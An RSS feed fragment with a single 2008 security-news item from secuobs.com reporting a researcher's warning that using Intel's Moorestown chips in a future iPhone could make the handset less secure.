<item><title>Intel's Moorestown would make iPhone less secure</title><description>2008-10-31 16:25:48 - News : Putting Intel's Moorestown chips in a future version of the iPhone could make the handset less secure, a researcher warned</description><link>http://www.secuobs.com/revue/news/32773.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/32773.shtml</guid></item>

 </channel>
</rss>
